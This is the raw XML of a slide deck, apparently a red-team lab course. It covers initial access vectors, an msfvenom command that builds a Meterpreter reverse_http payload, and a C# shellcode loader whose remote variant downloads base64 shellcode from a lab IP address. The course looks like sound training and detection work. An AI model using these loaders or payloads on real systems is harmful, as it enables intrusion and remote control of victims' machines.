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4" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="259" r:id="rId4"/>
    <p:sldId id="263" r:id="rId5"/>
    <p:sldId id="256" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="258" r:id="rId10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7"/>
    <p:restoredTop sz="82177"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="104" d="100"/>
          <a:sy n="104" d="100"/>
        </p:scale>
        <p:origin x="5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2C5A6-4F3C-D84D-9221-1C111BE58B0C}" type="datetimeFigureOut">
              <a:t>09/02/2025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2C456-DB8C-ED4F-9E61-F11EE322FFA0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7746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rPr lang="en-BE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93415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rPr lang="en-BE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5272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https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>https://learn.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject</a:t>
            </a:r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64884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7EB0-FD68-C911-6FEE-A1126AA4E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4156B-E477-EBBF-DB58-6A9853FF8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5A122-9B68-7115-8A56-B9FF9AE9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09/02/2025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0E77B-F874-1CF4-CB8A-6434B90CA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C7DA7-6573-D37F-44CA-A25C4C6B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7105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BC93-E28A-DCA1-86F1-5BDB9B93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ED448-95D6-A92E-4139-FCBC0B89E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C8612-A121-6041-16B9-770E99E5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09/02/2025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E3068-A8A4-981A-DAE5-DBD1E4B1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9D831-8079-52F8-022A-24ED59543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2082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614192-E250-AC57-D5AB-75CD2F4D6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90C84-EA5C-3F52-C6F2-7D98B1F81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E3F53-3D9D-862F-F920-8245B404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09/02/2025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3FD39-FFB5-FD80-EB4D-EC718CD77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E641E-DF8B-B5F7-DE08-521EFFCE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3641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A635-532B-BE07-9D06-0B7F69E2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680EA-D6A9-11A6-2F82-7C019A4C0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EA67A-067F-90DE-F6D6-5789BD65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09/02/2025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1E636-152A-1ADD-1EDB-C1D51F25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764B0-246C-B6EB-93DC-5C8DEA85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3480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7EF93-BC45-491A-73C5-CE86ECDC3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26B78-F10C-10C4-446B-6A037310A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BA753-581A-5AB3-B58C-0DE00A1E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09/02/2025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01742-CDC4-29FB-9AAF-B1BAC9B2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48548-AE7F-1166-82CD-E67B132E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9678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01EB-963E-F2D0-8FEB-6B3CC3F8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F4A5D-FCCD-83AC-4AE3-F38701233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87436-AA44-B818-61A6-FBFABC7F9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798A7-ACFC-9116-5F4F-C583DB4B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09/02/2025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33DC3-1BC3-36CA-4A0F-ACC6DE76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0BA0F-C8D7-7EA8-2161-5D89D6DB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4837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7350-AFC9-D261-6879-FC5BEABA0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75E34-D400-A8A8-9134-31DA786FF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13CDA-E558-A8F5-1C78-3D52F08B7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5BA5E-4313-8A6C-E1B7-D6DF72140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32DAE-7F1D-7DB3-9008-DD26A5E5D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78AA8-3916-E53F-DF3D-9A6E9A49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09/02/2025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86EBE-F62F-8259-4DA8-DD23AE6EE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CA00BE-A5A9-36FD-3989-7A3DE849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8369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94AF-7B90-E28C-5223-8872946C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AADB1-FDE5-37CC-8322-CDC43DFB2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09/02/2025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2A106-C0EC-87EE-5D72-0AF6B069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BDD0D-2E15-8EA5-83C4-78F46CC8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1229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FA0D21-02F2-49BA-1F9C-852AAF58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09/02/2025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4BDAC-CD9C-78FD-5ED8-62C056D34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A0010-EEF3-E26D-BBB4-2825BDD7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4714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B182-9E23-CD8F-98BC-13821186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1E6F3-C986-CEDB-815A-8DE2AFAFC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C8323-A4DE-0543-1D4E-B3791E3BB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C8683-FD80-4AD1-B765-6A4BB7877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09/02/2025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32971-6F0C-DF91-BF8B-D46A115C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45D68-0017-409C-47FD-B5C6379E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5978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A502-027C-967B-7E20-15E6CBE40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BBE84-9563-8AF7-E58E-4699BA7DF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FD3BB-F398-0382-5478-B3F0D76E9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6F304-2B60-CDDF-CE3A-BB18ECD3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09/02/2025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B1DE3-1209-D980-D353-A1D5A0A6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412BB-0163-750C-254A-87FAD45D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1351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99946-229F-1042-4D9D-B75C50B61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2AE09-E8D1-2EF6-E696-652C28CC2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55301-2004-0FE3-F7C6-AF0C0DA18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8B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
              <a:t>09/02/2025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DB58D-72D2-D51E-8AEF-65D32D6E3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80E2A-65AC-0ACD-DC0B-D4AB6C99D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0531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A8C098-234F-E862-0CBF-2DB0D188D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49" y="4337737"/>
            <a:ext cx="1930149" cy="18586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488065-A101-01D1-8165-1BFE8A4ED836}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1834736" y="4039286"/>
            <a:ext cx="332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Student machines (per student)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6DBF50-9F54-052E-4AFA-9FAD408A0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216" y="4337737"/>
            <a:ext cx="1950823" cy="18818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78B0AB-8BEA-A426-FB2D-074272E9004D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7384912" y="4087165"/>
            <a:ext cx="80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INFRA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E0F688-A41C-AACF-50A2-E3B821BCC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8423" y="4313023"/>
            <a:ext cx="1839944" cy="19080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C6DDB3-E73A-8421-1ACC-9DAEFE4CFD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8416" y="1329724"/>
            <a:ext cx="2209800" cy="2247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7D1C92-FB47-6E11-3E6B-F079F9621288}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5299866" y="1145057"/>
            <a:ext cx="80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INFRA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F3794E-6A63-159C-99BC-12B9E87C9E34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6722075" y="1530344"/>
            <a:ext cx="3978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/>
              <a:t>Traefik</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Guacamole (RDP)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Portainer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Elastic + Kibana (Central data lake for all windows logs incl. DC)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29D59B-2669-EDF0-6C6B-D30CE57D177A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8711514" y="339295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/>
              <a:t>Winlogbeat (SYSMON)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70763F-67C3-B010-A5FA-E0F05DF1A7D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="969495" y="6061161"/>
            <a:ext cx="218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/>
              <a:t>Winlogbeat (SYSMON)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>Filebeat (ETW)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>RDP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B40E0DB-93B6-EB0B-8D1F-E9BCE0610FF3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2250239" y="1949560"/>
            <a:ext cx="1884063" cy="28922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821EF6D2-C3F1-CB41-4383-77A6E41429A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="1"/>
            <a:endCxn id="9" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5743316" y="3577625"/>
            <a:ext cx="1104900" cy="170104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38D6F2B-51C9-BB3C-1D49-48C5F3DD55E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2213495" y="2090406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400"/>
              <a:t>Sysmon + ETW Logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-B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67AB1B-6143-B9FB-73DC-5674900C0CE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4587205" y="3979443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400"/>
              <a:t>Sysmon + Event Logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-BE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CE3F7D-2AC4-B7AF-55AC-E41448ABDE28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4040659" y="2818714"/>
            <a:ext cx="1147559" cy="2099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EC6D57-CDA8-75DA-2101-9D989C982CDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2010730" y="2818713"/>
            <a:ext cx="3163171" cy="1792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E88AF05-A45B-F814-DF1E-B7B2E599CE97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5188218" y="2844454"/>
            <a:ext cx="2015612" cy="1636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9487998-EEC3-B62E-E97F-5D2A5E4B5B9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4828515" y="337882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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RDP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17EBF9-0DBE-24D6-6130-84EC157E2F30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="10" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5692105" y="308919"/>
            <a:ext cx="9827" cy="83613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D027286-7F16-507C-4586-B03DCF61BD22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5768080" y="332683"/>
            <a:ext cx="2160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HTTP to Guacamole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CED628-5137-35B1-2F21-112A4FEBD438}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="781049" y="974521"/>
            <a:ext cx="10636594" cy="9299"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:schemeClr val="accent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B9D060C-1319-3972-FF7D-05F1559CEE4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10553304" y="121670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AZURE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2934E5-02D5-6E6B-BE89-D0B1AEFF5D1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10491520" y="28427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INTERNET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1B51EC-0B71-C72D-B9D8-24ADD54568CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6991354" y="6061160"/>
            <a:ext cx="218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/>
              <a:t>Winlogbeat (SYSMON)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>RDP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>DNS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7F00B2-C954-D612-FE0D-2B15E139220B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2606833" y="6054467"/>
            <a:ext cx="2182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/>
              <a:t>SSH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>RDP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>HAVOC</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>METASPLOIT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="147021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5761-3E29-EBE5-5C03-BDEBADC9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Generate shellcode (requires loader)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94C1C-A7C6-575E-01D1-578FBC053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9106"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>msfvenom -p windows/meterpreter/reverse_http LHOST=10.0.0.4 LPORT=80 -f csharp -o msf.txt</a:t>
            </a:r>
          </a:p>
          <a:p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C528F1-1A40-9C62-1479-7F6FC6402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78" y="2774731"/>
            <a:ext cx="7772400" cy="328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7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B6BA-66C8-A501-7821-306AF409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Custom Local Shellcode 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D8256-0920-1DD5-09DA-3DFEF0DA7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42976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ABD6-7828-52DA-270A-5A920070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Most common initial access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A1086-2C4B-A676-E341-BD4EF723F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VPN compromise (phished credentials)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Mail delivery (documents, links etc…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Vulnerable exposed services</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="946056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1D8D0A-CCF7-963D-3C76-A1FA23D22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16" y="111211"/>
            <a:ext cx="12139472" cy="674678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DBDC2B-6DF6-E6D6-502B-5BB962F613E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1828800" y="518984"/>
            <a:ext cx="212309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Frame 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AEB1170-3BBB-E625-831B-7A79BFF6FFA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588936" y="883404"/>
            <a:ext cx="1889088" cy="193728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rgbClr val="FF0000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252CD377-9B86-133F-3E92-8F6DE1647AB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="884256" y="1335543"/>
            <a:ext cx="944544" cy="193728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rgbClr val="FF0000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5A5297B0-00BD-7D72-BC40-4ECAAD8B5161}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1070352" y="3566056"/>
            <a:ext cx="1343664" cy="193728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8D0017-A38F-99BB-762D-A5F8C2EE8F54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2478024" y="3661472"/>
            <a:ext cx="212309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63D3334-6B6E-ED2C-BF71-A5A85BDD4D50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4601114" y="3522972"/>
            <a:ext cx="1511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200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Entrypoint (method)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270F10-5485-D545-D676-D152016BE2BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3951890" y="380484"/>
            <a:ext cx="6060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200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>milar to libraries/header files -&gt; Compiler to use system namespace (dotnet framework)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B9C16E-3723-1C21-6AF6-7327AC2E3A12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3951890" y="1160364"/>
            <a:ext cx="3902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Function declarations</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P/Invoke to load unmanaged code (C# is managed code)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows API written in C and C++</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="120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8C1AD8-14A1-AF9D-5756-DA57F82B38ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3223381" y="1474042"/>
            <a:ext cx="728509" cy="45459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35F815-A402-1012-F96A-64F01D430E03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302493" y="1483530"/>
            <a:ext cx="649397" cy="109587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0EBF36-B57E-36CA-2B9B-A04B0231AEE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602887" y="1483530"/>
            <a:ext cx="349003" cy="163838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4D11D2-FF1C-27A6-049C-2BD6F5B82273}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2684238" y="906448"/>
            <a:ext cx="1472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400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unmanaged DLL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6C28F0-5B53-8726-E04E-0CD5E1B49815}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2384460" y="1234038"/>
            <a:ext cx="838921" cy="36701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24DFBF-E173-88A1-AC06-52F0D38ED746}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8753382" y="1839540"/>
            <a:ext cx="3097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200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Return starting address of the memory code</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>will be injected into,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68BAF3-5E0A-E793-86EF-7B5EC93CF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747" y="3033185"/>
            <a:ext cx="4314832" cy="154641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650349-9EC3-E010-D6A9-A210E5CB93CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2607942" y="3644918"/>
            <a:ext cx="4817390" cy="120151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7B80DCA-8F22-064C-5755-6DB46D3D53DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7428461" y="4515606"/>
            <a:ext cx="43006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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc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4465643-5CD2-7ECD-E088-03826B9644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65" y="5033264"/>
            <a:ext cx="4215429" cy="154565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42583E-8AE1-31AD-38C2-5C79DD885334}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3777388" y="4838194"/>
            <a:ext cx="3733148" cy="145768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412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12E8-6AEC-5CC3-4D9D-7BACEA76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MSDN Functions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64076-69EF-069F-FEDE-E0BAF0C69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31509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85F3B-E7B5-8FE5-726B-1F26BC1AC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74C6-9914-0C5E-9F3E-92A8E398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Custom Remote Shellcode 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E7CC6-DE1A-7880-1678-F3D2445E6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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>ownload shellcode remotely into memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>getConsoleWindow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payloadUrl = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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"http://192.168.85.149:8000/payload.txt"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byte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[] shellCode;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1350"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:b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(WebClient client = </a:t>
            </a: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WebClient()) {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payloadBase64 = client.DownloadString(payloadUrl);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shellCode = Convert.FromBase64String(payloadBase64);</a:t>
            </a:r>
          </a:p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04672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51491-844D-79A1-5FC4-0B5926988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5FA7-D7D8-4BAD-1A1A-762680690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MSDN Functions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72998-434E-7745-786C-25D79BE0E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18576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BC26-AE94-B0C3-F3DD-417E80B6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CCDDD-C51E-97CE-924E-748A96843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2986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32781</TotalTime>
  <Words>327</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>50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Menlo</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Generate shellcode (requires loader)</vt:lpstr>
      <vt:lpstr>Custom Local Shellcode Loader</vt:lpstr>
      <vt:lpstr>Most common initial access vectors</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>MSDN Functions needed</vt:lpstr>
      <vt:lpstr>Custom Remote Shellcode Loader</vt:lpstr>
      <vt:lpstr>MSDN Functions needed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 Schoonaert</dc:creator>
  <cp:lastModifiedBy>Luk Schoonaert</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-12-19T12:05:14Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-09T17:41:59Z</dcterms:modified>
</cp:coreProperties>
</file>